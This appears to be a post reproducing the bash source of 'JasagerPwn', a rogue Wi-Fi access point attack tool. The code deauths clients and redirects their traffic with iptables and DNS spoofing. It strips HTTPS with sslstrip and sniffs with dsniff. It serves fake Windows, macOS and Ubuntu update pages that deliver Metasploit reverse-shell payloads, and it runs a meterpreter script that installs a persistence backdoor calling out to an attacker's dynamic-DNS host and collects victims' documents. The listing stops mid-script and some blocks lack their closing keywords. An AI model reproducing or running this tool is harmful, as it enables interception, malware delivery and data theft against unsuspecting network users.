Discover Top Posts Tagged with #attackvector

JasagerPwn Attack

#!/bin/bash

#leg3nd's JasagerPwn Attack - v1.1 Final - rev8

#ATTACKS - browserPwn - Redirect LAN to Metasloits auxillary module browser autoPwn for sessions

# - FakeUpdate - Redirect LAN to fake update page with metasploit payload download.

# - Java Applet - Redirects LAN to a java applet with meterpreter payload. via SET.

# - Sniffer - Justs picks up traffic with no ARP posioning, and perfect ssl stripping

# - DeAuth - Deauths nearby clients from their APs and try to make them join yours

# Allows control of internet transparency of all attacks via built in bash menu.

# Reqires: Aircrack-ng suite (w/ airdrop-ng), Metasploit Framework, Social Engineering Toolkit, Dsniff suite

# Apache2, working ruby and python, Injection, DHCP3, SSLstrip, PHP5, Macchanger.

# Created for and tested with an RTL8187 monitor mode card, and a open-WRT Fon+ (Pineapple).

# For More Information refer to INSTALL_HOWTO, usage information -h / -?, or post on Hak5 Forums.

#SCRIPT CONFIGURATION BELOW - ADJUST TO YOUR WIFI CONFIGURATION

IFACE="eth1" #Connection to the internet (gateway), EG wlan0,eth1,usb0,ppp0,etc

WiFiMODE="1" #Use WiFi For Internet Gateway (Will create a DeAuth Rule so you dont own yourself) EG 0,1

fonIP="192.168.10.2" #Fon router Iface IP, this is -HARDCODED- to 192.168.10.0 subnet, the dhcp.conf is below to change.

FONIFACE="eth2" #Interface facing the Jasager router

WIFACE="wlan0" #Wireless Interface, EG wlan0,ath0,wifi0

MIFACE="mon0" #Monitor Interface for Attacks

#Macchanger, ONLY FOR ATTACK INTERFACES

macMode="set" #Mac spoofing mode - set / random (case sensitive)

fakeMac="00:e0:f7:99:e1:30" # 00:e0:f7:99:e1:30 (Cisco Systems, Inc.) lawl

ourAPmac="00:12:CF:A4:DF:26" #Pineapple MAC so we dont DeAuth Ourselves!

msfpath="/pentest/exploits/framework3" #Metasploit Location (if not BT5, use msf3 directory)

SETpath="/pentest/exploits/set" #Social Engineering Toolkit Location

DomainName="Networking.com" #Domain name for DHCP configuration.

######################################################################################################################

#Funcion can be used to customize post-exploit meterpreter script. This example steals documents and adds a DNS backdoor.

#This slightly modified persistence script supports D-DNS tracking (like dyndns.org or no-ip)

autoMetScript="0" #Allows you to automaticlly run a meterpreter persistence script on the victim.

Pport="31337" # persistence backdoor port

PersIP="Your.dyndns-ip.com" # Your dyndns or no-ip for backdoors

function metScript(){

if [ -e "$SETpath/src/program_junk/multi_meter.file" ] ; then rm "$SETpath/src/program_junk/multi_meter.file" ; fi #Dont touch this line

# EDIT METERPRETER SCRIPT BELOW THIS, INSIDE THE ECHO QUOTES

echo -e "persistence_dns -r $PersIP -p $Pport -i 60 -X -A

file_collector -d c:\\Users\\ -r -f *.doc|*.pdf|*.xls|*.docx| -o /tmp/files

file_collector -i /tmp/files -l $SPWD/collected/

" > $SETpath/src/program_junk/multi_meter.file #DONT CHANGE THIS PATH

}

#DHCP Configuration - Change if you want a different subnet.

if [ -e "/etc/dhcp3/dhcpd.conf" ]; then mv /etc/dhcp3/dhcpd.conf /etc/dhcp3/dhcpd.conf.ORIGINAL ; fi

if [ -e "/tmp/dhcpd.conf" ]; then rm /tmp/dhcpd.conf; fi

echo -e "#jasagerPwn.dhcp

ddns-update-style none;

one-lease-per-client false;

authoritative;

ignore client-updates;

default-lease-time 60; # 24 hours=86400

max-lease-time 72; # 48 hours=172800

log-facility local7;\n

subnet 192.168.10.0 netmask 255.255.255.0 {

interface $FONIFACE;

range 192.168.10.3 192.168.10.254;

option routers 192.168.10.2;

option subnet-mask 255.255.255.0;

option broadcast-address 192.168.10.255;

option domain-name-servers $fonIP;

option domain-name \"$DomainName\";

allow unknown-clients;

}" >> /etc/dhcp3/dhcpd.conf

####-END SCRIPT CONFIG-######

#====================================================================================================================

####################################################################################################################

#SCRIPT VARIABLES - DO NOT TOUCH - HARDCODED AND SENSITIVE

#REQUIRED CHECKS FOR FUNCTIONALITY

version="1.1"

rev="8"

Jwww="/var/www/javapwn"

Gwww="/var/www/google"

Fwww="/var/www/fakeupdate"

gatewayIP=`route -n | awk '/^0.0.0.0/ {getline; print $2}'`

WIFcheck=`ifconfig | grep $WIFACE | awk '{ print $1 }'`

IFcheck=`ifconfig | grep $IFACE | awk '{ print $1 }'`

NOW=$(date +"%b-%d_%H:%m:%S")

sslport="11000"

SPWD=`echo $PWD`

osxPORT="30505"

nixPORT="30504"

winPORT="30503"

pyPORT="30502"

javasite="1"

sniffing="0"

wasSniffing="0"

fakeupdate="0"

browserpwn="0"

javaATK="0"

z="1"

moncheck=`ifconfig | grep $MIFACE | awk '{print $1}' | cut -b 4`

ATKcheck=`ifconfig | grep $MIFACE | awk '{print $1}' | cut -b 4`

ourIP=`ifconfig $FONIFACE | awk '/inet addr/ {split ($2,A,":"); print A[2]}'`

wifiMAC=`ifconfig $IFACE | grep "HWaddr" | awk '{print $5}' | tr "[a-z]" "[A-Z]"`

googleRev=`wget -qO- "http://jasagerpwn.googlecode.com/svn/trunk/" | grep "<title>jasagerpwn - Revision" | awk -F " " '{split ($4,A,":"); print A[1]}'`

trap 'cleanup' 2 # Interrupt - "Ctrl + C"

#-----------------------------------------------------------------------

function help() { #help

echo "

- Version $version - Revision $rev -

(C)opyright 2011 leg3nd @ www.info-s3curity.com

Usage: bash jasagerPwn -i [interface] -m [random/set] -s [00:11:22:33:44:55]

-p [31337] -a [0/1] -w [interface]

Options:

-a [0/1] : Auto-Run Meterpreter Script, Customize in script. Current = $autoMetScript

-p [31337] : Auto-Run Scripts persistence Port. Current = $Pport

-i [interface] : Internet Gateway Interface. Current = $IFACE

-w [interface] : WiFi Card Interface. Current = $WIFACE

-d [0/1] : WiFi Gateway Mode - Adds DeAuth Rule For Yourself. Current = $WiFiMODE

-m [random/set] : Change the Attack Interfaces MAC Address. Current = $macMode

-s [MAC] : Use this MAC Address. Requires -m. Current = $fakeMac

-u : Update script and its resources from Google Code.

-U : Update script, SET, and Metasploit.

-? / -h : Help Screen and Switches. More Information In top of script.

For Installation, setup, and more information, please reference the INSTALL file, wiki, or

Post on the hak5 forums. Please leave comments in the Hak5 thread!

exit 1

}

function IPTABLES(){

xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Clearing IPTables" -e "iptables --flush"

xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Clearing IPTables" -e "iptables --table nat --flush"

xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Clearing IPTables" -e "iptables --delete-chain"

xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Clearing IPTables" -e "iptables --table nat --delete-chain"

xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Clearing IPTables" -e "iptables -X"

xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Clearing IPTables" -e "iptables -F"

sleep 4

iptables -P FORWARD ACCEPT

iptables -A FORWARD -m state --state ESTABLISHED,RELATED -j ACCEPT

iptables -A FORWARD -i $FONIFACE -o $IFACE -m state --state NEW -j ACCEPT

iptables -t nat -A PREROUTING --in-interface $FONIFACE -p udp --dport 53 -j DNAT --to $gatewayIP

iptables --append FORWARD --in-interface $FONIFACE -j ACCEPT

iptables --table nat --append POSTROUTING --out-interface $IFACE -j MASQUERADE

ifconfig $FONIFACE $fonIP

}

function ipTableRedirect {

xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Clearing IPTables" -e "iptables --flush"

xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Clearing IPTables" -e "iptables --table nat --flush"

xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Clearing IPTables" -e "iptables --delete-chain"

xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Clearing IPTables" -e "iptables --table nat --delete-chain"

xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Clearing IPTables" -e "iptables -X"

xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Clearing IPTables" -e "iptables -F"

sleep 4

if [ $sniffing -eq "1" ] ; then

#iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports $sslport

#iptables --table nat --append PREROUTING --proto tcp --destination-port 80 --jump REDIRECT --to-port 80

xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Killing Tail" -e "kill $TAILPID" &

xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Killing SSLStrip" -e "killall -9 sslstrip" &

wasSniffing=$sniffing

sniffing="0"

iptables -P FORWARD ACCEPT

iptables --append FORWARD --in-interface $FONIFACE -j ACCEPT

iptables --table nat --append POSTROUTING --out-interface $IFACE -j MASQUERADE

iptables -t nat -A PREROUTING --in-interface $FONIFACE -p udp -j DNAT --to $fonIP

sleep .5

iptables --table nat --append PREROUTING --in-interface $FONIFACE --proto tcp --jump DNAT --to $fonIP

iptables --table nat --append PREROUTING --in-interface $FONIFACE --jump REDIRECT

iptables --table nat --append PREROUTING --in-interface $FONIFACE

#redirect all traffic to us

#iptables -t nat -A PREROUTING -i $FONIFACE -j REDIRECT

ifconfig $FONIFACE $fonIP

}

#Script update via google code

function update(){

if [ ! $googleRev ]; then

echo -e "\e[01;31m[!]\e[00m ERROR: Couldn't resolve revision from google.."

exit 1

elif [ $googleRev -lt $rev ]; then

echo -e "\e[01;31m[!]\e[00m UPDATE: JasagerPwn Revisions have been RESET, Please Re-Download It!"

echo -e "\e[01;31m[!]\e[00m Command: svn checkout http://jasagerpwn.googlecode.com/svn/trunk/ jasager-pwn"

exit 1

elif [ $googleRev -gt $rev ]; then

echo -e "\e[01;36m[~]\e[00m leg3nd's JasagerPwn v$version rev$rev - Updating to rev$googleRev..."

wget -q -N -P "$SPWD/" "http://jasagerpwn.googlecode.com/svn/trunk/jasagerPwn"

wget -q -N -P "$SPWD/" "http://jasagerpwn.googlecode.com/svn/trunk/INSTALL_HOWTO"

wget -q -N -P "$SPWD/src/resources/" "http://jasagerpwn.googlecode.com/svn/trunk/src/resources/persistence_dns.rb"

wget -q -N -P "$SPWD/src/resources/" "http://jasagerpwn.googlecode.com/svn/trunk/src/deauth.sh"

#FakeUpdate (wwwFakeUpdate)

for Fitems in "index.php" ; do

if [ -e "$SPWD/src/wwwFakeUpdate/" ] ; then wget -q -N -P "$SPWD/src/wwwFakeUpdate/" "http://jasagerpwn.googlecode.com/svn/trunk/src/wwwFakeUpdate/$Fitems" ; fi

done

#FakeUpdate MS

for FitemsMS in "index.html" ; do

if [ -e "$SPWD/src/wwwFakeUpdate/ms/" ] ; then wget -q -N -P "$SPWD/src/wwwFakeUpdate/ms/" "http://jasagerpwn.googlecode.com/svn/trunk/src/wwwFakeUpdate/ms/$FitemsMS" ; fi

done

#FakeUpdate OSX

for FitemsOSX in "index.html" ; do

if [ -e "$SPWD/src/wwwFakeUpdate/osx/" ] ; then wget -q -N -P "$SPWD/src/wwwFakeUpdate/osx/" "http://jasagerpwn.googlecode.com/svn/trunk/src/wwwFakeUpdate/osx/$FitemsOSX" ; fi

done

#FakeUpdate Linux

for FitemsNIX in "index.html" ; do

if [ -e "$SPWD/src/wwwFakeUpdate/ubuntu/" ] ; then wget -q -N -P "$SPWD/wwwFakeUpdate/ubuntu/" "http://jasagerpwn.googlecode.com/svn/trunk/src/wwwFakeUpdate/ubuntu/$FitemsNIX" ; fi

done

#JavaPwn

for Jitems in "index.template" "index.template.plain" ; do

if [ -e "$SPWD/src/wwwJava/" ] ; then wget -q -N -P "$SPWD/src/wwwJava/" "http://jasagerpwn.googlecode.com/svn/trunk/src/wwwJava/$Jitems" ; fi

done

for Jitems2 in "global.js" "index.jsp" "oo_conf_en-US.js" "oo_engine.js" "popUp.js" "print.css" "s_code_remote.js" "screen.css" ; do

if [ -e "$SPWD/src/wwwJava/temp/" ] ; then wget -q -N -P "$SPWD/src/wwwJava" "http://jasagerpwn.googlecode.com/svn/trunk/src/wwwJava/temp/$Jitems2" ; fi

done

#Google

for Gitems in "index.template" ; do

if [ -e "$SPWD/src/wwwGoogle/" ] ; then wget -q -N -P "$SPWD/src/wwwGoogle/" "http://jasagerpwn.googlecode.com/svn/trunk/src/wwwGoogle/$Gitems" ; fi

done

for Gitems2 in "favicon.ico" "gzip.html" "js1.js" ; do

if [ -e "$SPWD/src/wwwGoogle/temp/" ] ; then wget -q -N -P "$SPWD/wwwGoogle/temp/" "http://jasagerpwn.googlecode.com/svn/trunk/src/wwwGoogle/temp/$Gitems2" ; fi

done

elif [ $googleRev -eq $rev ]; then

echo -e "\e[01;36m[~]\e[00m leg3nd's JasagerPwn v$version rev$rev - Your Already Up To Date!"

echo -e "\e[01;36m[~]\e[00m leg3nd's JasagerPwn v$version rev$googleRev - All Done!"

exit 1

}

#Full update including MSF/SET

function Fupdate(){

echo -e "\e[01;36m[~]\e[00m leg3nd's JasagerPwn v$version rev$googleRev - Updating Metasploit.."

xterm -fg green -bg black -geometry 75x20+0+0 -T "JasagerPwn v$version rev$googleRev - Metaploit Update" -e "cd $msfpath && ./msfupdate"

echo -e "\e[01;36m[~]\e[00m leg3nd's JasagerPwn v$version rev$googleRev - Updating SET.."

xterm -fg green -bg black -geometry 75x20-0+0 -T "JasagerPwn v$version rev$googleRev - SET Update" -e "cd $SETpath && python set-update"

if [ ! $googleRev ]; then

echo -e "\e[01;31m[!]\e[00m ERROR: Couldn't resolve revision from google.."

exit 1

elif [ $googleRev -lt $rev ]; then

echo -e "\e[01;31m[!]\e[00m ERROR: Your revision number is higher then it should be... "

exit 1

elif [ $googleRev -gt $rev ]; then

echo -e "\e[01;36m[~]\e[00m leg3nd's JasagerPwn v$version rev$rev - Updating to rev$googleRev..."

wget -q -N -P "$SPWD/" "http://jasagerpwn.googlecode.com/svn/trunk/jasagerPwn"

wget -q -N -P "$SPWD/" "http://jasagerpwn.googlecode.com/svn/trunk/INSTALL_HOWTO"

wget -q -N -P "$SPWD/src/" "http://jasagerpwn.googlecode.com/svn/trunk/src/resources/persistence_dns.rb"

wget -q -N -P "$SPWD/src/" "http://jasagerpwn.googlecode.com/svn/trunk/src/deauth.sh"

#FakeUpdate (wwwFakeUpdate)

for Fitems in "index.php" ; do

if [ -e "$SPWD/src/wwwFakeUpdate/" ] ; then wget -q -N -P "$SPWD/src/wwwFakeUpdate/" "http://jasagerpwn.googlecode.com/svn/trunk/src/wwwFakeUpdate/$Fitems" ; fi

done

#FakeUpdate MS

for FitemsMS in "index.html" ; do

if [ -e "$SPWD/src/wwwFakeUpdate/ms/" ] ; then wget -q -N -P "$SPWD/src/wwwFakeUpdate/ms/" "http://jasagerpwn.googlecode.com/svn/trunk/src/wwwFakeUpdate/ms/$FitemsMS" ; fi

done

#FakeUpdate OSX

for FitemsOSX in "index.html" ; do

if [ -e "$SPWD/src/wwwFakeUpdate/osx/" ] ; then wget -q -N -P "$SPWD/src/wwwFakeUpdate/osx/" "http://jasagerpwn.googlecode.com/svn/trunk/src/wwwFakeUpdate/osx/$FitemsOSX" ; fi

done

#FakeUpdate Linux

for FitemsNIX in "index.html" ; do

if [ -e "$SPWD/src/wwwFakeUpdate/ubuntu/" ] ; then wget -q -N -P "$SPWD/wwwFakeUpdate/ubuntu/" "http://jasagerpwn.googlecode.com/svn/trunk/src/wwwFakeUpdate/ubuntu/$FitemsNIX" ; fi

done

#JavaPwn (wwwJava)

for Jitems in "index.template" "index.template.plain" ; do

if [ -e "$SPWD/src/wwwJava/" ] ; then wget -q -N -P "$SPWD/src/wwwJava/" "http://jasagerpwn.googlecode.com/svn/trunk/wwwJava/$Jitems" ; fi

done

for Jitems2 in "global.js" "index.jsp" "oo_conf_en-US.js" "oo_engine.js" "popUp.js" "print.css" "s_code_remote.js" "screen.css" ; do

if [ -e "$SPWD/src/wwwJava/temp/" ] ; then wget -q -N -P "$SPWD/src/wwwJava" "http://jasagerpwn.googlecode.com/svn/trunk/wwwJava/temp/$Jitems2" ; fi

done

#Google (wwwGoogle)

for Gitems in "index.template" ; do

if [ -e "$SPWD/src/wwwGoogle/" ] ; then wget -q -N -P "$SPWD/src/wwwGoogle/" "http://jasagerpwn.googlecode.com/svn/trunk/wwwGoogle/$Gitems" ; fi

done

for Gitems2 in "favicon.ico" "gzip.html" "js1.js" ; do

if [ -e "$SPWD/src/wwwGoogle/temp/" ] ; then wget -q -N -P "$SPWD/wwwGoogle/temp/" "http://jasagerpwn.googlecode.com/svn/trunk/wwwGoogle/temp/$Gitems2" ; fi

done

elif [ $googleRev -eq $rev ]; then

echo -e "\e[01;36m[~]\e[00m leg3nd's JasagerPwn v$version rev$rev - Your Already Up To Date!"

echo -e "\e[01;36m[~]\e[00m leg3nd's JasagerPwn v$version rev$googleRev - All Done!"

exit 1

}

#function for fluid use of both SET templates

function JavaSite(){

GoogCheck=`cat $SETpath/config/set_config | grep "APACHE_DIRECTORY=/var/www/javapwn"`

#1 = google 2 = java required

if [ "$javasite" -eq "1" ] && [ "$GoogCheck" = "APACHE_DIRECTORY=/var/www/javapwn" ]; then

sed ''${SETapacheDIR}'s!APACHE_DIRECTORY=/var/www/javapwn!APACHE_DIRECTORY=/var/www/google!' $SETpath/config/set_config > $SETpath/config/set_configJ

sleep 1

mv $SETpath/config/set_configJ $SETpath/config/set_config

elif [ "$javasite" -eq "2" ]; then

sed ''${SETapacheDIR}'s!APACHE_DIRECTORY=/var/www/google!APACHE_DIRECTORY=/var/www/javapwn!' $SETpath/config/set_config > $SETpath/config/set_configG

sleep 1

mv $SETpath/config/set_configG $SETpath/config/set_config

}

function sslstrip(){

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports $sslport

xterm -geometry 75x3+1-25 -bg black -fg green -e "sslstrip -l $sslport && sleep 3" &

if [ ! -e sslstrip.log ]; then touch sslstrip.log; fi

xterm -geometry 75x24+464+65 -bg black -fg green -T "SSLStrip Sniffing" -e "tail -f sslstrip.log" &

TAILPID=`echo $!`

sniffing="1"

wasSniffing=$sniffing

}

function cleanup() {

echo

echo -e "\e[01;32m[>]\e[00m Cleaning up..."

if [ -e /tmp/dhcpd.conf ]; then rm -f /tmp/dhcpd.conf; fi

resolvIDs=`ps aux | grep "bash /tmp/resolv" | grep -v grep | awk '{ print $2 }'`

xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Killing DriftNET" -e "kill `echo $resolvIDs | awk '{ print $1 }'` ; kill `echo $resolvIDs | awk '{ print $2 }'` ; kill `echo $resolvIDs | awk '{ print $3 }'`" &

xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Killing DriftNET" -e "killall -9 driftnet" &

xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Killing SSLStrip" -e "killall -9 sslstrip" &

xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Killing Apache" -e "/etc/init.d/apache2 stop" &

xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Killing Tail" -e "kill $DNSID" &

xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Killing Dsniff" -e "kill $dsniffID" &

xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Killing Tail" -e "kill $TAILPID" &

#xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Killing SSL Parsing" -e "kill $parseID" &

xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Killing DHCP" -e "kill $messageID" &

xterm -geometry 75x12+464+288 -bg black -fg green -T "JasagerPwn v$version - Killing DeAuth Attacks" -e "kill $AIRDROPID && kill $AIRDUMPID && kill $airID && kill $ipID && kill $dnsID2 && kill $parseID" &

#xterm -geometry 75x7+10+330 -T "[leg3nd-BrowserPwn] v$version - Killing DNSSpoof" -e "killall -9 dnsspoof" &

xterm -geometry 75x7+10+330 -T "[JasagerPwn-BrowserPwn] v$version - Killing DHCP3" -e "/etc/init.d/dhcp3-server stop"

xterm -geometry 75x7+10+330 -T "[JasagerPwn-BrowserPwn] v$version - Killing URLSnarf" -e "killall -9 urlsnarf"

xterm -geometry 75x7+10+330 -T "[JasagerPwn-BrowserPwn] v$version - Killing DSniff" -e "killall -9 dsniff"

xterm -geometry 75x8+100+0 -T "v$version - Killing 'IPtables'" -e "iptables -F" &

xterm -geometry 75x8+100+0 -T "v$version - Killing 'IPtables'" -e "iptables -X" &

#Clean up our cfgs

if [ -e "$PWD/dsniff.services" ]; then rm "$PWD/dsniff.services" ; fi

if [ -e "$SPWD/*.png" ]; then rm "$SPWD/*.png" ; fi

if [ -d "$SETpath/src/html/templates/java/temp/" ]; then rm -rf $SETpath/src/html/templates/java/temp/ ; fi

if [ -d "$SETpath/src/html/templates/google/temp/" ]; then rm -rf $SETpath/src/html/templates/google/temp/ ; fi

if [ -e "$SETpath/src/html/templates/java/index.template" ] && [ -e "$SETpath/src/html/templates/java/index.template.ORIGINAL" ]; then

mv "$SETpath/src/html/templates/java/index.template.ORIGINAL" "$SETpath/src/html/templates/java/index.template"

APACHEDIR=`cat $SETpath/config/set_config | grep "/var/www/javapwn"`

if [ -e "$SETpath/src/html/templates/google/index.template.ORIGINAL" ] ; then mv $SETpath/src/html/templates/google/index.template.ORIGINAL $SETpath/src/html/templates/google/index.template ; fi

if [ -e "$SETpath/src/html/templates/java/index.template.ORIGINAL" ] ; then mv $SETpath/src/html/templates/java/index.template.ORIGINAL $SETpath/src/html/templates/java/index.template ; fi

if [ -e "$SETpath/config/set_config.ORIGINAL" ] ; then mv $SETpath/config/set_config.ORIGINAL $SETpath/config/set_config ; fi

if [ -e "/etc/dhcp3/dhcpd.conf" ] && [ -e "/etc/dhcp3/dhcpd.conf.ORIGINAL" ] ; then rm /etc/dhcp3/dhcpd.conf && mv /etc/dhcp3/dhcpd.conf.ORIGINAL /etc/dhcp3/dhcpd.conf ; fi

if [ -e "/etc/resolv.conf" ] && [ -e "/etc/resolv.conf.ORIGINAL" ] ; then rm /etc/resolv.conf && mv /etc/resolv.conf.ORIGINAL /etc/resolv.conf ; fi

if [ -e "$SPWD/src/wwwFakeUpdate/ubuntu/index.html.ORIGINAL" ] ; then cp -f $SPWD/src/wwwFakeUpdate/ubuntu/index.html.ORIGINAL $SPWD/src/wwwFakeUpdate/ubuntu/index.html ; fi

if [ -e "$SPWD/src/wwwFakeUpdate/osx/index.html.ORIGINAL" ] ; then cp -f $SPWD/src/wwwFakeUpdate/osx/index.html.ORIGINAL $SPWD/src/wwwFakeUpdate/osx/index.html ; fi

if [ -e "/tmp/msfrcBP" ]; then rm "/tmp/msfrcBP"; fi

if [ -e "/tmp/msfrcFU" ]; then rm "/tmp/msfrcFU"; fi

if [ -e "/tmp/jasagerpwn.dns" ]; then rm "/tmp/jasagerpwn.dns"; fi

if [ -e "/tmp/deauth.conf" ]; then rm "/tmp/deauth.conf"; fi

if [ -e "/tmp/auto-google2" ]; then rm "/tmp/auto-google2"; fi

if [ -e "/tmp/auto-java2" ]; then rm "/tmp/auto-java2"; fi

if [ -e "/tmp/resolv.sh" ]; then rm "/tmp/resolv.sh"; fi

if [ -e "$SPWD/sslstrip.log" ]; then mv "$SPWD/sslstrip.log" "$SPWD/collected/$NOW-sslstrip.log"; fi

xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Killing Self" -e "killall -9 jasagerPwn" &

echo -e "\e[01;36m[~]\e[00m Exiting with elegance.."

exit 0

}

function fakeupdate(){

ourIP=`ifconfig $FONIFACE | awk '/inet addr/ {split ($2,A,":"); print A[2]}'`

if [ -e "$pwd/src/wwwFakeUpdate/ms/Windows-KB183905-x86-ENU.exe" ]; then rm -f "$pwd/src/wwwFakeUpdate/ms/Windows-KB183905-x86-ENU.exe"; fi

if [ -e "$pwd/src/wwwFakeUpdate/osx/SecurityUpdate1-83-90-5.dmg.bin" ]; then rm -f "$pwd/src/wwwFakeUpdate/osx/SecurityUpdate1-83-90-5.dmg.bin"; fi

if [ -e "$pwd/src/wwwFakeUpdate/ubuntu/USN1228.bin" ]; then rm -f "$pwd/src/wwwFakeUpdate/ubuntu/USN1228.bin"; fi

if [ -e "$pwd/src/wwwFakeUpdate/ubuntu/nix.bin" ]; then rm -f "$pwd/src/wwwFakeUpdate/ubuntu/nix.bin"; fi

if [ -e "$Fwww/osx/SecurityUpdate1-83-90-5.dmg.bin" ]; then rm -f "$Fwww/osx/SecurityUpdate1-83-90-5.dmg.bin"; fi

if [ -e "$Fwww/ubuntu/USN1228.bin" ]; then rm -f "$Fwww/ubuntu/USN1228.bin"; fi

if [ -e "$Fwww/ubuntu/nix.bin" ]; then rm -f "$Fwww/ubuntu/nix.bin"; fi

#xterm -geometry 75x15+10+0 -bg black -fg green -T "[Metasploit Payload] v$version - Metasploit (OSX)" -e "msfpayload osx/x86/shell_reverse_tcp LPORT=$osxPORT LHOST=$fonIP X > $Fwww/osx/SecurityUpdate1-83-90-5.dmg.bin"

xterm -geometry 75x15+10+0 -bg black -fg green -T "[Metasploit Payload] v$version - Metasploit (OSX)" -e "msfpayload osx/x86/shell_reverse_tcp LPORT=$osxPORT LHOST=$fonIP X > $Fwww/osx/osx.bin"

#xterm -geometry 75x15+10+0 -bg black -fg green -T "[Metasploit Payload] v$version - Metasploit (Linux)" -e "msfpayload linux/x86/shell_reverse_tcp LPORT=$nixPORT LHOST=$fonIP X > $Fwww/ubuntu/USN1228.bin"

xterm -geometry 75x15+10+0 -bg black -fg green -T "[Metasploit Payload] v$version - Metasploit (Linux)" -e "msfpayload linux/x86/shell/reverse_tcp LPORT=$nixPORT LHOST=$fonIP X > $Fwww/ubuntu/nix.bin"

sleep .5 && xterm -geometry 110x42+464-38 -bg black -fg green -T "[Metasploit Handler] v$version - Metasploit" -e "msfconsole -r /tmp/msfrcFU" &

echo -e "\e[01;33m[!]\e[00m Forcing LAN to visit our site..."

ipTableRedirect

xterm -geometry 75x7+10+330 -bg black -fg green -T "[JasagerPwn-DNS Kill] v$version - Killing DNSSpoof" -e "killall -9 dnsspoof" &

sleep .5 && xterm -geometry 75x7+0-36 -bg black -fg green -T "[JasagerPwn-DNS Spoof] v$version - DNSSpoof" -e "dnsspoof -i $FONIFACE -f /tmp/jasagerpwn.dns" &

echo -e "\e[01;33m[>]\e[00m Starting Web Server @ $fonIP:80..."

xterm -geometry 75x8+100+0 -T "v$version - Starting Apache2" -e "/etc/init.d/apache2 restart"

service apache2 restart > /dev/null

sleep .5

xterm -geometry 75x8+100+0 -T "v$version - Starting Apache2" -e "ls /etc/apache2/sites-available/ | xargs a2dissite && a2ensite fakeupdate && a2enmod php5 && /etc/init.d/apache2 reload"

fakeupdate="1"

}

#had to add another fuction becuase of the MSF-RC file , probably a more elegant way to approach this.

function updateLoop(){

while true

if [ $browserpwn -eq 1 ]; then break; fi

if [ $javaATK -eq 1 ]; then break; fi

echo

echo -e "\e[01;33m[MODE][==========-FakeUpdate Attack-==========][!]\e[00m"

#read -r -p "[?] Enter [I] to give Internet back or [M] for Main Menu: " USR_CHOICE1

echo -e -n "\e[01;33m[!]\e[00m [S][1] to Stop Attack or [M][2] for Main Menu: "

read -e USR_CHOICE96

case $USR_CHOICE96 in

S|s|Stop|stop|1)

xterm -geometry 75x7+10+330 -bg black -fg green -T "[JasagerPwn-IPTABLES] v$version" -e "iptables --table nat --delete PREROUTING --in-interface $FONIFACE"

xterm -geometry 75x7+10+330 -bg black -fg green -T "[JasagerPwn-IPTABLES] v$version" -e "iptables --table nat --delete PREROUTING --in-interface $FONIFACE --jump REDIRECT"

xterm -geometry 75x7+10+330 -bg black -fg green -T "[JasagerPwn-IPTABLES] v$version" -e "iptables --table nat --delete PREROUTING --in-interface $FONIFACE --proto tcp --jump DNAT --to $fonIP"

IPTABLES

xterm -geometry 75x7+10+330 -bg black -fg green -T "[JasagerPwn-DNS Kill] v$version" -e "killall -9 dnsspoof" &

xterm -geometry 75x5+0+94 -bg black -fg green -T "[JasagerPwn-Apache Kill] v$version" -e "/etc/init.d/apache2 stop" &

fakeupdate="0"

if [ $wasSniffing != "0" ]; then sslstrip ; fi

echo -e "\e[01;33m[!]\e[00m DONT FORGET TO RUN 'ipconfig /flushdns' ON VICTIM!!"

break

;;

M|m|Menu|menu|2)

break

;;

*) echo -e "\e[01;31m[!]\e[00m Error: Please Choose From The Menu.."

esac

done

}

while getopts "a:p:i:w:m:s:d:h?uU" OPTIONS; do

case ${OPTIONS} in

a ) autoMetScript="$OPTARG" ;;

p ) Pport="$OPTARG" ;;

d ) WiFiMODE="$OPTARG" ;;

i ) IFACE="$OPTARG" ;;

w ) WIFACE="$OPTARG" ;;

h ) help ;;

m ) macMode="$OPTARG" ;;

s ) fakeMac="$OPTARG" ;;

u ) update ;;

U ) Fupdate ;;

? ) help ;;

* ) echo -e "\e[01;31m[!]\e[00m Error: Unknown Switch Option" 1>&2 ;; # Default

esac

done

ifconfig $WIFACE up && sleep .5

gatewayIP=`route -n | awk '/^0.0.0.0/ {getline; print $2}'`

WIFcheck=`ifconfig | grep $WIFACE | awk '{ print $1 }'`

IFcheck=`ifconfig | grep $IFACE | awk '{ print $1 }'`

ifconfig $FONIFACE $fonIP

#make sure our IP doesnt get screwy from any dhcp..

while true ; do ifconfig $FONIFACE $fonIP && sleep 1 ; done &

ipID=`echo $!`

gatewayIP=`route -n | awk '/^0.0.0.0/ {getline; print $2}'`

#check for required interfaces

if [ "$WIFcheck" != "$WIFACE" ]; then

echo -e "\e[01;31m[!]\e[00m FATAL: Cannot Locate $WIFACE..." && exit 0

if [ "$IFcheck" != "$IFACE" ]; then

echo -e "\e[01;31m[!]\e[00m FATAL: Cannot Locate $IFACE..." && exit 0

#----------------------------------------------------------------------------

#=========================-Begin STDOUT-=====================================

clear

echo

#Startup banner

cat "$SPWD/src/resources/banner"

echo

echo -e "\e[01;32m[>]\e[00m Stopping services and programs..."

xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Killing 'DHCP3 Service'" -e "/etc/init.d/dhcp3-server stop"

